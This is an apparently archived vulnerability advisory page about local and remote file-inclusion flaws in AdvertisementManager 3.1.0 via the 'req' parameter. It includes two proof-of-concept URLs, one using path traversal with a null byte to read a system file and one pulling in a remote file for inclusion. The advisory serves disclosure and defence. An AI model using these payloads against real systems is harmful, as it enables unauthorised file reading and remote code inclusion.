Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2010-1106

Publish Date: 19 Jan 2010

                							

                source: http://www.securityfocus.com/bid/44165/info

AdvertisementManager is prone to local and remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow a remote attacker to obtain sensitive information or compromise the application and the underlying computer; other attacks are also possible.

AdvertisementManager 3.1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&amp;passw=indoushka&amp;savelogin=on&amp;admin=Enter&amp;req=../../../../../../../../boot.ini%00

http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&amp;passw=indoushka&amp;savelogin=on&amp;admin=Enter&amp;req=http://www.example.com/c.txt?

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

AdvertisementManager 3.1 - 'req' Local/Remote File Inclusion

Vulmon Search

About

Products

Connect